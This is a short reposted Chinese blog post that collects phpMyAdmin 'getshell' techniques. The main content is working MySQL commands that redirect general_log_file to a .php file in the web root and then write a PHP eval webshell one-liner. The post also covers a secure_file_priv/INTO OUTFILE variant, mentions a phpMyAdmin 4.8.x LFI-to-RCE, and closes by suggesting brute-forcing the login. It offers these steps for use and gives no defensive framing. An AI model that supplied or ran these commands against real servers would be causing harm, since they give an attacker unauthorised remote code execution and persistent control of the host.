phpmyadmin getshell大法

栏目: 数据库 · Mysql · 发布时间: 6年前

内容简介:整理phpmyadmin的两种getshell方法,后续有其他方法再更新。show variables like ‘general%’;

0x00 概述

整理phpmyadmin的两种getshell方法,后续有其他方法再更新。

0x01 select日志

show variables like ‘general%’;

phpmyadmin getshell大法

set global general_log = ‘ON’;# MySQL 返回的查询结果为空 (即零行)。

set global general_log_file = ‘C:/phpStudy/PHPTutorial/WWW/logshell.php’;# MySQL 返回的查询结果为空 (即零行)。

phpmyadmin getshell大法

SELECT ‘<?php @eval($_POST[lsa]);?>’

phpmyadmin getshell大法

0x02 into outfile

此法有局限性,必须secure_file_priv不为null && 为网站路径

show variables like “secure_file_priv”;

默认Null

尝试设置为网站目录:

phpmyadmin getshell大法

需要修改my.ini

secure_file_priv=’网站路径

phpmyadmin getshell大法

phpmyadmin getshell大法

phpmyadmin getshell大法

0x03 其他

还有 phpmyadmin4.8.x LFI to RCE

0x04 结语

phpmyadmin上述getshell方法都要登录,可尝试爆破。

0x05 参考资料

www.freebuf.com/column/173672.html


以上所述就是小编给大家介绍的《phpmyadmin getshell大法》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
Remote

Remote

Jason Fried、David Heinemeier Hansson / Crown Business / 2013-10-29 / CAD 26.95

The “work from home” phenomenon is thoroughly explored in this illuminating new book from bestselling 37signals founders Fried and Hansson, who point to the surging trend of employees working from hom......一起来看看 《Remote》 这本书的介绍吧!

码农工具
html转js在线工具
html转js在线工具

html转js在线工具

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2024 码农网 粤ICP备17054400号-3